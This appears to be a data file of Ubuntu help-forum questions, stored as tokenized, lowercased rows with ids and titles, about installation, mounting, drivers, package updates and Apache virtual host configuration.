265195	sed/awk - remove all tags except only two tags and plain texts	here is a sample for my text file : < w : r > < w : t > < w : r w : rsidr= '' 00d171fd '' > < w : t > < /w : t > < /w : r > < w : r > < w : t xml : space= '' preserve '' > this is a sample text < /w : t > < /w : r > < w : highlight w : val= '' green '' / > < w : r w : rsidr= '' 00d171fd '' > < w : color w : val= '' ff0000 '' / > < w : t > sample text < /w : t > < /w : r > the problem is that i need both the pure text and the following tags only : color w : val= '' ff0000 '' highlight w : val= '' green '' how can this be done ?
265198	ubuntu server 12.04 lts usb install	i 'm trying to install ubuntu server 12.04 from usb and i 've been struggling with it for 3 days . i do n't remember i had this hard time even when building my hackintoshes . so , now i 'm at the point where i tried everything i found - unetbootin , startup disk creator , live usb creator - nothing really works , as it does n't detect the usb as a cd-rom . i tried the switch cdrom-detect/try-usb=true to no avail . at least now i managed to get over this problem with the following method . i make the usb boot disk , i copy the *.iso to the usb too , i boot the installer and when i get the cd-rom error , i alt+f2 and do the following : mkdir /usb mount -t vfat /dev/sdb1 /usb ls /usb ( so i see the name of the iso clearly ) mount -t iso9660 -o loop /usb/whatever-the-iso-is-called.iso /cdrom ls /cdrom ( so i see it has mounted the iso right ) so mounting the iso in a word . i select `` load configuration from cd-rom '' or something like that and i got rid of the cd-rom error . everything 's peachy until i get to the configure apt screen , where it ca n't connect to the internet because i 'm behind a firewall and it does n't give me the choice to enter the proxy and it just quits to the installation choices screen . now if i tell the installer to let me configure what software i want installed , it just tries to configure apt , it fails and it quits to the choices screen . then i can continue the installation with install grub , it installs it and it works after restart . but i have absolutely nothing installed , not even nano , my sources.list is empty with only the cd-rom resources line . i do n't know what to do ... i need lamp , smb , ssl , cups installed - i do n't want to do everything manually . has anyone succeeded doing a start to finish installation using usb ? if yes , how ? btw , everything works ok if you install from the cd ( even if i plug the lan cable out , it still configures apt and it still populates the sources.list ) . but i do n't have a cd drive on the system i want to do the final install too and i do n't want to buy any external cd drive just to get this done . all help welcome , i 'm going crazy with this ...
265201	my ntfs and ext4 partition mounts as read only	after upgrading some packets ( that i do n't know what ) , my ext4 partitions are mounted as read only : m @ mpc ~ $ sudo mount /dev/sda5 /mnt mount : warning : /mnt seems to be mounted read-only . my ntfs partitions are mounted as read only too and when i want to use fsck it says : m @ mpc ~ $ sudo fsck /dev/sda5 [ sudo ] password for m : fsck from util-linux 2.20.1 fsck : fsck.ntfs : not found fsck : error 2 while executing fsck.ntfs for /dev/sda5 how can i solve this problem ? edit : ext partitions are now ok , but still problem with ntfs .
265202	ca n't update ubuntu 12.10	my update manager always failed the last few days . this what i get w : failed to fetch http : //ppa.launchpad.net/rohityadav/vlmc/ubuntu/dists/quantal/main/source/sources 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
265209	running two commands in crontab	i have this line in my crontab file */1 * * * * espeak 'foo ' & & espeak 'bar' but only half of it , first command gets executed every minute . while when i write this in the terminal it works like a charm . is there a different way to execute 2 commands in the same line in the crontab file ?
265210	set hotmail account in unity mail	i 've been googling for quite some time but nowhere have i found a way to set a hotmail ( windows live ) account for unity mail . in preferences , under server data , i do n't know what to put in the host / port fields . is hotmail supported by unity mail anyway ?
265216	ubuntu reinstall without losing /home ?	i got to a state when upgrade is not possible - old system ( 10.10 , packages index too broken ) i dediced to reinstall . now i 'd like to keep my /home . ideally , i 'd like to burn a cd or iso to usb and click next , next , next . how should i proceed ?
265226	installing wifi driver error 127	i 've got problem with installation wifi driver , terminal says error 127. make [ 1 ] : leaving directory `/usr/src/linux-headers-3.0.0-32-generic' root @ jakub-hp-probook-4540s : /home/jakub/compat-wireless-3.6.6-1-snpc # make install make : execvp : ./scripts/update-initramfs : permission denied make : *** [ uninstall ] error 127 any solution ?
265227	how to patch vmware player 3.1.5 for 32 bit machine with new lubuntu 12.10 kernel ?	sorry for my spelling and grammar errors , english is not my native launguage . i need to run vmware-player-3.1.5-491717.i386 in lubuntu . it has to be that version only , cause my motherboard architecture is 32bits . thats why i cant use newer versions of vmware player . i download this patch : vmware workstation 7.1.5 / player 3.1.5 fix for linux 3.2+ ( patch by ariel ) , i extracted and put in in my home folder . from this website : weltall.heliohost.org my steps : 1 ) ok , so i already install vmware-player-3.1.5-491717.i386 2 ) if i start vmware-player-3.1.5-491717.i386 i get this error message : vmware kernel module updater , before you can run vmware , several modules must be compiled and loaded into the running kernel . 3 ) ok so time to use the patch 4 ) i put on terminal this commands : sudo apt-get install build-essential linux-headers-`uname -r` sudo chmod +x vmware-player-3.1.5-491717.i386.bundle sudo ./vmware-player-3.1.5-491717.i386.bundle sudo apt-get install patch sudo ./patch-modules_3.2.0.sh 5 ) it finish the hole process succesfully and it patch it . but when i try to run vmware player , i still get the same error . before with old kernel it worked properly and i was able to run it with no problems . but with new lubuntu kernel , now i get the error message , and wont get away . vmware kernel module updater , before you can run vmware , several modules must be compiled and loaded into the running kernel 6 ) i noticed that the patch i download has 2 files : a ) patch-modules_3.2.0.sh b ) vmware-715-kernel32.patch i am able to run patch-modules_3.2.0.sh properly , and i am able to install it succesfully , but i dont know how to install or run vmware-715-kernel32.patch . i getting the feeling that , this is why i am getting the errors message , because i havent install properly the vmware-715-kernel32.patch any ideas of what command i need to run in the terminal in order to run vmware-715-kernel32.patch , and been able to patch the kernel succesfully ?
265229	installing windows 7 after a kubuntu install ?	i have a kubuntu 12.10 installation that i use as a primary work machine . this is a single installation ( 2 partition os / swap ) . i need to install windows7 and the majority of tutorials ( all ) assume that windows is installed first . is it possible to use the kde partition manager to shrink the kubuntu partition , add the two required windows partitions and install a 'working ' windows7 install ? do any tutorials exists as i imagine this might be messy ...
265233	ubuntu 12.10 : black screen after installing nvidia-current	computer : macbook pro 7'1 ( mid 2010 ) graphic card : nvidia 320m today , after a fresh install of ubuntu quantal quetzal , i installed the suggested nvidia drivers from terminal by running the following command : sudo apt-get install nvidia-current and then : sudo nvidia-xconfig but when i rebooted , after chosing ubuntu from the boot loader , the screen was black and there was nothing i could do ... how can i fix this ? thank you roadrm for your helpful answer , but i still can not boot into a usable system even editing the kernel and adding the nomodeset string : ( i managed to boot the 3.5.0-17 , but my default kernel is the 3.5.0-25 so this does n't help ... i should probably add to the informations that before installing the nvidia-current i also entered the following commands : sudo apt-get install linux-source and sudo apt-get install linux-headers-generic in order to give the correct headers for the driver : (
265238	netflix on ubuntu black screen	i 've installed netflix-desktop using the sudo apt-add-repository ppa : ehoover/compholio method . see this link for the whole thing . it works great up until i select a show . after i select a show i get a black screen . i have a dual monitor setup , but i removed one hoping that was the problem . i 'm running ubuntu 12.10 on an amd 64-bit . i 've uninstalled reinstalled . reinstalled from command line , from software center , et . al . i 'm using standard ubuntu drivers for my video .
265242	bash command : ls -lah not showing /etc directory ?	ok guys , elementary question . i was poking around my server , and i noticed that when i 'ls ' the / directory , /etc folder is not displayed . why is that ? i can very easily cd into it , but why is it not displaying when i 'm getting a list of those directories ? note : i 'm using 'ls -lah' list , all , human-readable . the 'all ' is showing me all directories , even hidden ones . does the /etc folder have a different property to it that others do not ?
265243	delete windows 7 after installing wubi.exe	long story short , i need ubuntu on this net-book installed critically by tomorrow . i do n't have any flash drives , but the net-book already has windows 7 . if i install wubi.exe , will i be able to get rid of windows 7 and use the space that windows 7 was in for ubuntu ? i still have more then enough space left to install ubuntu , but for whats due tomorrow , i will not . i 'm installing 12.4lts . if you have any questions ask right away and i will answer because if i do n't do this by tomorrow , my boss will probably kill me . i will be on this website until i get an answer that will help me .
265245	how do i run a .jar file via the terminal	mispelled classname in manifest.txt file caused this error im trying to run a java file outside of my ide by exporting the .jar file to my documents folder and trying to display the text 'hello world'in the file on the terminal line . i attempted to create a manifest.txt file with this in it , main-class : lightning.java.hello.myfirstclass i then used this script to create a file myjar.jar and got this back , lightning @ rigel5 : ~ $ jar cfm myjar.jar manifest.txt lightning.java.hello/*.class java.io.filenotfoundexception : manifest.txt ( no such file or directory ) at java.io.fileinputstream.open ( native method ) at java.io.fileinputstream . ( fileinputstream.java:138 ) at java.io.fileinputstream . ( fileinputstream.java:97 ) at sun.tools.jar.main.run ( main.java:171 ) at sun.tools.jar.main.main ( main.java:1177 )
265247	difference between core temp and cpu temp	i installed a sensor reporting utility on my ubuntu machine ( a desktop machine ) and it reports drastically different temperatures for the acpi cpu reading and the isa core 0/core 1 reading . the acpi says the cpu temperature is 31.5 c , but the isa adapter reports the core 0 is 55.0 c and core 1 is 56.0 c. why do the `` cpu '' and `` core '' temperatures differ ? are these sensors in different locations on the motherboard ?
265256	changing a directory	in terminal i want to change a directory to something with a # sign in it . for example # filename.chat and ca n't seem to remember how to do this . from the command line i think it is suppose to be cd /filename.chat/ but does n't seem to work .
265272	ubuntu 12.10 dash home	i 'm using ubuntu 12.10 on my dell inspiron 6400 , and the dash home pop-up window apears too late after pushing the windows button on keyboard or clicking it 's button on left-side pane . is it due to my poor hardware performance or it 's an ubuntu drawback ? i 'm using 1 gb ram and intel® core™2 cpu t7200 @ 2.00ghz × 2 cpu thanks in advance
265275	i ca n't update my ubuntu	my ubuntu wo n't update at all . first , i click `` update now '' and it starts scanning for files that can be updated and then it says that it can only do a partial upgrade . i click continue and after about 30 minutes it says that it ca n't update at all . i 'm not much of a computer guy and do n't know why it 's doing this .
265278	ubuntu 12.10 not suspending	i 'm having a problem with my asus s400 with ubuntu 12.10 installed . it 's set to suspend when closing the lid , but it does n't . it does n't suspend from the menu either , it blinks and the screen comes back 2 seconds later . i tried the second script provided here : http : //ubuntuforums.org/showthread.php ? t=1978290 & page=6 and it works , but ust the first time . after the lid is closed and the laptop gets suspended it comes back normally , but wo n't suspend again . any ideas ?
265279	catalyst control center 13.1 resets my hdtv scaling options after reboot	i have installed ubuntu 12.10 . after installing ati 13.1 drivers , i configure ati overscan to fit desktop to screen . the problem is that when i reboot catalyst reset the setting . i 've tried everything on internet but nothing seems fixing it . can you help me ?
265285	virtual wireless interface	i have one laptop with one physical wireless card . i need it to support two virtual wireless interface so that it support extra vlan , or one for lan the other in ad-hoc mode , using wireless . is there any driver or software for this on windows and/or linux ?
265287	hard drive mounted at / , duplicate mounted hard drive after using mountmanager	possible duplicate post i 'm running 12.04 64bit . my system is a dual boot for both ubuntu and windows7 . both operating systems are sharing the drive named `` elements '' . my volume named `` elements '' is a 1tb sata ntfs hard drive that shows up twice in the side bar in nautilus . one of the icons is functional and even has the convenient `` eject '' icon next to it . below is a picture of the left menu in nautilus , with system monitor- > file systems tab open on top of it . can someone advise me about how to get rid of this extra icon ? i think the problem is much more deep-rooted than just a gui glitch on nautilus ' part . the other icon does nothing but spit out the following error when i click on it ( image below ) . this only happened after i tried using mount manager to automate mounting the drive at start up . i 've already uninstalled mount manager , and restarted , but the problem did n't go away . the hard drive does mount automatically now , so i guess that 's cool . but now , every time i boot up now and open nautilus , both of these icons appear , one of which is fictitious and useless . according to the image above and the outputs of several other commands , it appears to be mounted at / in which case , no matter where i am in nautilus when i try to click on that icon , of course it will tell me that that drive is in use by another program ... nautilus . i 'm afraid of trying to unmount this hard drive ( sdb6 ) because of where it appears to be mounted . i 'm kind of a noob , and i have this gut feeling that tells me trying to unmount a drive at / will destroy my entire file system . this fear was further strengthened by the output of `` $ fsck '' at the very bottom of this post . error immediately below when that 2nd `` elements '' hard drive is clicked in nautilus : unable to mount elements mount is denied because the ntfs volume is already exclusively opened . the volume may be already mounted , or another software may use it which could be identified for example by the help of the 'fuser ' command . it 's odd to me that that error message above claims that it 's an ntfs volume when everything else tell me that it 's an ext4 volume . the actual hard drive `` elements '' is in fact an ntfs volume . here 's the output of a few commands and configuration files that may be of interest : $ fuser -a / / : 2120r 2159rc 2160rc 2172r 2178rc 2180rc 2188r 2191rc 2200rc 2203rc 2205rc 2206r 2211r 2212r 2214r 2220r 2228r 2234rc 2246rc 2249rc 2254rc 2260rc 2261r 2262r 2277rc 2287rc 2291rc 2311rc 2313rc 2332rc 2334rc 2339rc 2343rc 2344rc 2352rc 2372rc 2389rc 2422r 2490r 2496rc 2501rc 2566r 2573rc 2581rc 2589rc 2592r 2603r 2611rc 2613rc 2615rc 2678rc 2927r 2981r 3104rc 4156rc 4196rc 4206rc 4213rc 4240rc 4297rc 5032rc 7609r 7613r 7648r 9593rc 18829r 18833r 19776r $ sudo df -h filesystem size used avail use % mounted on /dev/sdb6 496g 366g 106g 78 % / udev 2.0g 4.0k 2.0g 1 % /dev tmpfs 791m 1.5m 790m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 672k 2.0g 1 % /run/shm /dev/sda1 932g 312g 620g 34 % /media/elements /home/solderblob/.private 496g 366g 106g 78 % /home/solderblob /dev/sdb2 188g 100g 88g 54 % /media/a2b24eacb24e852f /dev/sdb1 100m 25m 76m 25 % /media/system reserved $ sudo fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00093cab device boot start end blocks id system /dev/sda1 2048 1953519615 976758784 7 hpfs/ntfs/exfat disk /dev/sdb : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000e8d9b device boot start end blocks id system /dev/sdb1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sdb2 206848 392378768 196085960+ 7 hpfs/ntfs/exfat /dev/sdb3 392380414 1465147391 536383489 5 extended /dev/sdb5 1456762880 1465147391 4192256 82 linux swap / solaris /dev/sdb6 392380416 1448374271 527996928 83 linux /dev/sdb7 1448376320 1456758783 4191232 82 linux swap / solaris partition table entries are not in disk order $ cat /etc/fstab # < file system > < mount point > < type > < options > < dump > < pass > uuid=77039a2a-83d4-47a1-8a8c-a2ec4e4dfd0e / ext4 defaults 0 1 uuid=f6549cc4549c88cf /media/elements ntfs-3g users 0 0 $ sudo blkid /dev/sda1 : label= '' elements '' uuid= '' f6549cc4549c88cf '' type= '' ntfs '' /dev/sdb1 : label= '' system reserved '' uuid= '' 5cde130fde12e156 '' type= '' ntfs '' /dev/sdb2 : uuid= '' a2b24eacb24e852f '' type= '' ntfs '' /dev/sdb6 : uuid= '' 77039a2a-83d4-47a1-8a8c-a2ec4e4dfd0e '' type= '' ext4 '' $ sudo blkid -c /dev/null ( appears to be exactly the same as above ) /dev/sda1 : label= '' elements '' uuid= '' f6549cc4549c88cf '' type= '' ntfs '' /dev/sdb1 : label= '' system reserved '' uuid= '' 5cde130fde12e156 '' type= '' ntfs '' /dev/sdb2 : uuid= '' a2b24eacb24e852f '' type= '' ntfs '' /dev/sdb6 : uuid= '' 77039a2a-83d4-47a1-8a8c-a2ec4e4dfd0e '' type= '' ext4 '' $ mount /dev/sdb6 on / type ext4 ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sda1 on /media/elements type fuseblk ( rw , noexec , nosuid , nodev , allow_other , blksize=4096 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) /home/solderblob/.private on /home/solderblob type ecryptfs ( ecryptfs_check_dev_ruid , ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs , ecryptfs_sig=76a47b0175afa48d , ecryptfs_fnek_sig=391b2d8b155215f7 ) gvfs-fuse-daemon on /home/solderblob/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=solderblob ) /dev/sdb2 on /media/a2b24eacb24e852f type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sdb1 on /media/system reserved type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) $ ls -a . a2b24eacb24e852f ubuntu 12.04.1 lts amd64 .. elements system reserved $ cat /proc/mounts rootfs / rootfs rw 0 0 sysfs /sys sysfs rw , nosuid , nodev , noexec , relatime 0 0 proc /proc proc rw , nosuid , nodev , noexec , relatime 0 0 udev /dev devtmpfs rw , relatime , size=2013000k , nr_inodes=503250 , mode=755 0 0 devpts /dev/pts devpts rw , nosuid , noexec , relatime , gid=5 , mode=620 , ptmxmode=000 0 0 tmpfs /run tmpfs rw , nosuid , relatime , size=809872k , mode=755 0 0 /dev/disk/by-uuid/77039a2a-83d4-47a1-8a8c-a2ec4e4dfd0e / ext4 rw , relatime , user_xattr , acl , barrier=1 , data=ordered 0 0 none /sys/fs/fuse/connections fusectl rw , relatime 0 0 none /sys/kernel/debug debugfs rw , relatime 0 0 none /sys/kernel/security securityfs rw , relatime 0 0 none /run/lock tmpfs rw , nosuid , nodev , noexec , relatime , size=5120k 0 0 none /run/shm tmpfs rw , nosuid , nodev , relatime 0 0 /dev/sda1 /media/elements fuseblk rw , nosuid , nodev , noexec , relatime , user_id=0 , group_id=0 , allow_other , blksize=4096 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , nosuid , nodev , noexec , relatime 0 0 /home/solderblob/.private /home/solderblob ecryptfs rw , relatime , ecryptfs_fnek_sig=391b2d8b155215f7 , ecryptfs_sig=76a47b0175afa48d , ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs 0 0 gvfs-fuse-daemon /home/solderblob/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , relatime , user_id=1000 , group_id=1000 0 0 /dev/sdb2 /media/a2b24eacb24e852f fuseblk rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , default_permissions , allow_other , blksize=4096 0 0 /dev/sdb1 /media/system\040reserved fuseblk rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , default_permissions , allow_other , blksize=4096 0 0 gvfs-fuse-daemon /root/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , relatime , user_id=0 , group_id=0 0 0 $ fsck fsck from util-linux 2.20.1 e2fsck 1.42 ( 29-nov-2011 ) /dev/sdb6 is mounted . warning ! ! ! the filesystem is mounted . if you continue you ***will*** cause ***severe*** filesystem damage . do you really want to continue < n > ? no check aborted .
265292	problem resolving own hostname	i 'm running 10.04 lts server . i am unable to resolve this issue : `` unable to resolve host serverubuntu '' . i 've attempted all of the recommended solutions and none have worked . i 've read that this issue might arise from incorrect settings in the hosts and hostname files : here are the contests of these files : file : hostname serverubuntu file : hosts 127.0.0.1 localhost 127.0.1.1 serverubuntu # the following lines are desirable for ipv6 capable hosts : :1 localhost ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters note : i 've tried several different entries for the second line of the hosts file : 127.0.1.1 serverubuntu serverubuntu.hvc.rr.com 127.0.1.1 serverubuntu serverubuntu.hvc.rr.com serverubuntu none have worked . i do have my server assigned a static ip address : 192.168.1.199
265293	removed a package , its still installed ... wine	kevin @ kevins-pc : ~/desktop $ sudo apt-get remove wine reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : gnome-exe-thumbnailer icoutils libcapi20-3 libgif4 libmpg123-0 libnss-winbind libodbc1 libopenal-data libopenal1 libpam-winbind odbcinst odbcinst1debian2 ttf-droid ttf-umefont ttf-unfonts-core unixodbc winbind wine-gecko1.4 wine1.4 wine1.4-common wine1.4-i386 use 'apt-get autoremove ' to remove them . the following packages will be removed : wine 0 upgraded , 0 newly installed , 1 to remove and 283 not upgraded . after this operation , 21.5 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 158269 files and directories currently installed . ) removing wine ... kevin @ kevins-pc : ~/desktop $ wine usage : wine program [ arguments ... ] run the specified program wine -- help display this help and exit wine -- version output version information and exit kevin @ kevins-pc : ~/desktop $ wine -- help usage : wine program [ arguments ... ] run the specified program wine -- help display this help and exit wine -- version output version information and exit kevin @ kevins-pc : ~/desktop $ wine notepad why is wine still there if i just removed it ?
265296	arctic p311 bluetooth headset crappy sound	i connected my new arctic p311 bluetooth headset to my laptop . i can hear and speak as expected . but the sound quality of what i can hear is really bad . when i change audio hardware setup in phonon to high fidelity the sound is great but i can not use the microphone . does that mean whenever i wan to use the microphone i must live with the bad sound quality of the headphones ? or can i use the mic and the headphones with high sound quality ? how can i do this ?
265297	why am i unable to mount my cd/dvd drives ?	sorry to ask this question which has been asked by dozens of other people , but it seems that though the symptoms may be the same , most people have different issues . i installed ubuntu 12.10 on my acer aspire5100-5023 computer which has its own issues ( particularly that there is n't a compatible graphics driver for the onboard video and i 'm using opengl , but that 's a different story altogether ) . the build in dvd-rw does n't seem to be detected by ubuntu and an external dvd drive , an asus sdr-08b1-u slim dvd reader , does n't seem to want to mount . it may be malfunctioning hardware , but it seems to unlikely that both should fail . right now this question will focus on my external usb dvd reader , the asus sdr-08b1-u . so the output of sudo lshw -c disk is *-disk description : scsi disk product : 10eacs external vendor : wd physical id : 0.0.0 bus info : scsi @ 2:0.0.0 logical name : /dev/sda version : 1.65 serial : wd-wcau40146829 size : 931gib ( 1tb ) capabilities : partitioned partitioned : dos configuration : ansiversion=4 sectorsize=512 signature=44fdfe06 *-disk description : scsi disk physical id : 0.0.0 bus info : scsi @ 5:0.0.0 logical name : /dev/sdb size : 14gib ( 15gb ) capabilities : partitioned partitioned : dos configuration : sectorsize=512 signature=c3072e18 *-disk description : scsi disk physical id : 0.0.0 bus info : scsi @ 6:0.0.0 logical name : /dev/sdc size : 7441mib ( 7803mb ) capabilities : partitioned partitioned : dos configuration : sectorsize=512 signature=c3072e18 *-cdrom description : dvd reader product : sdr-08b1-u vendor : asus physical id : 0.0.0 bus info : scsi @ 7:0.0.0 logical name : /dev/cdrom logical name : /dev/dvd logical name : /dev/sr0 version : 1.00 capabilities : removable audio dvd configuration : status=busy i tried to mount the drive manually by creating a directory /media/myusername/cdrom0 and typing in sudo mount /dev/sr0 /media/myusername/cdrom0 but that results in mount : /dev/sr0 already mounted or /media/myusername/cdrom0 busy so then i tried umount /dev/sr0 which returns umount : /dev/sr0 is not mounted ( according to mtab ) the drive is making sounds as if it is restarting itself constantly . the light indicating that it is operating is on . now , previously when i used it with windows , it seemed to work , however , since then , on boot up , i get a fixed disk error with my harddrive and have been booting ubuntu from and external usb harddrive since , which works remarkably well ! but i ca n't verify that the drive is working 100 % . however , rather than jump to the conclusion `` it must be a hardware issue , gtfo '' i would appreciate any possible suggestions to see it there is something else i can do . alternatively , i 'm opened to suggestions about my built in optical drive . it does n't even show up when i use lshw but the drive does light up when i insert media . so here 's the output of dmesg | grep /dev/sr0 [ 48868.707336 ] sr0 : scsi3-mmc drive : 24x/24x cd/rw xa/form2 cdda pop-up [ 48868.707807 ] sr 5:0:0:0 : attached scsi cd-rom sr0 okay , so i looked around other questions and online forums for people with similar issues . here 's one command used to get information , though i 'm not quite sure what the command actually does or what the information reflects . sorry , i 'm not an expert . running wodim -- prcap dev=/dev/sr0 returns wodim : operation not permitted . warning : can not raise rlimit_memlock limits . device type : removable cd-rom version : 0 response format : 2 capabilities : vendor_info : 'asus ' identification : 'sdr-08b1-u ' revision : '1.00' device seems to be : generic mmc2 dvd-rom . drive capabilities , per mmc-3 page 2a : does read cd-r media does not write cd-r media does read cd-rw media does not write cd-rw media does read dvd-rom media does read dvd-r media does not write dvd-r media does not read dvd-ram media does not write dvd-ram media does not support test writing does read mode 2 form 1 blocks does read mode 2 form 2 blocks does read digital audio blocks does restart non-streamed digital audio reads accurately does not support buffer-underrun-free recording does read multi-session cds does read fixed-packet cd media using method 2 does not read cd bar code does read r-w subcode information does not return r-w subcode de-interleaved and error-corrected does read raw p-w subcode data from lead in does return cd media catalog number does return cd isrc information does support c2 error pointers does not deliver composite a/v data does play audio cds number of volume control levels : 256 does support individual volume control setting for each channel does support independent mute setting for each channel does not support digital output on port 1 does not support digital output on port 2 loading mechanism type : pop-up does not support ejection of cd via start/stop command does not lock media on power up via prevent jumper does not allow media to be locked in the drive via prevent/allow command is not currently in a media-locked state does not support changing side of disk does not have load-empty-slot-in-changer feature does not support individual disk present feature maximum read speed : 4233 kb/s ( cd 24x , dvd 3x ) current read speed : 4234 kb/s ( cd 24x , dvd 3x ) maximum write speed : 0 kb/s ( cd 0x , dvd 0x ) current write speed : 0 kb/s ( cd 0x , dvd 0x ) rotational control selected : clv/pcav buffer size in kb : 198 copy management revision supported : 1 number of supported write speeds : 0 confirmed : a friend tested this drive on a netbook running windows 7 and it was able to run a dvd ( starcraft 2 if anyone cares ) without issues . windows was able to access the drive without any drivers , just plug n play . so there is not an hardware issue/defect . again , it sounds as though the drive restarts every few seconds when i plug it into ubuntu 12.10 . so the question is whether this is a bug or something else that can be fixed . and here 's the product spec page http : //usa.asus.com/optical_storage/external_slim_dvd_drive/sdr08b1u/ # specifications
265298	mount an [ ipaddress ] /dir on 12.04 in terminal	this is probably a super simple question , but googles failing me . in windows , i can map a network drive , and point it to `` \10.10.0.28\sample_folder '' and it works just fine . on my ubuntu machine , i have no idea how to perform this task . ideally i would like to mount it for future usage , as its going to be a pretty integral part of my workflow for a long time to come .
265300	how do i setup “name based” virtual hosts using ubuntu 12.04 ?	how do i setup “name based” virtual hosts using ubuntu 12.04 ? i have followed the instructions given at https : //help.ubuntu.com/12.04/serverguide/httpd.html # http-configuration . i 've done the following ... cp default newsite replace “/var/www” with “/var/www/newsite” in newsite add “servername newsite.example.com” to newsite after some research , i found a blog entry that stated i needed to disable the default site using a2dissite default . after i did that , it worked . is that correct ? this is never mentioned in the ubuntu server guide . the guide also includes this line ... “the default virtual host has no servername directive specified , so it will respond to all requests that do not match a servername directive in another virtual host.” which seems to imply that both the default site and others can co-exist . i 'm running a fresh install of 12.04 server and have reloaded the apache config each time i made an adjustment . in summary ... after adding a new file under /etc/apache2/sites-available ( an altered copy of the “default” file with the servername directive added ) and the corresponding symlink under /etc/apache2/sites-enabled , is it necessary to disable or rename the default site symlink in order for the new site to function ? the documentation and one answer given below seems to infer that it is not necessary to do so , but if so , what have i done wrong ? using the config below , when trying to access newsite.example.com i get the default site . /etc/apache2/sites-available $ cat default < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /var/www < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > < /virtualhost > /etc/apache2/sites-available $ cat newsite < virtualhost *:80 > documentroot /var/www/newsite servername newsite.example.com < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/newsite/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > /etc/apache2/sites-enabled # ls -l root @ sandbox : /etc/apache2/sites-enabled # ls -l total 0 lrwxrwxrwx 1 root root 26 mar 18 09:56 000-default - > ../sites-available/default lrwxrwxrwx 1 root root 26 mar 7 13:36 newsite - > ../sites-available/newsite
265301	external hard drive is not recognized	i have a new 1 gb external hard drive which i was trying to partition with gparted . evidently i did something wrong and now it does not show up in my computer or in ubuntu . how can i repair it ?
265302	altering window resize during drag	i 'm looking to have my app be able to alter the window size during a user 's drag of the border , similar to the windows wm_sizing ( this is a port ) . i have some windows with minimum width or height , and a window that has a fairly complex relationship between the two that must be computed on the fly . gdkgeometry hints are n't helpful . i need a wm_sizing equivalent that lets me take a proposed size and pass it off to one of several other routines to i see gtkcontainer 's check-resize signal , but i do n't think that allows you to change the size . am i missing something ? can i just call gtk_widget_set_size_request and gtk_window_resize on the window 's child widget from inside the check-resize signal handler ? seems to have the potential for disaster .
265304	why does the default site for apache in ubuntu have “ < directory / > ” ?	these are the contents of /etc/apache2/sites-available/default < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /var/www < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > < /virtualhost > what is the following block for ? < directory / > options followsymlinks allowoverride none < /directory >
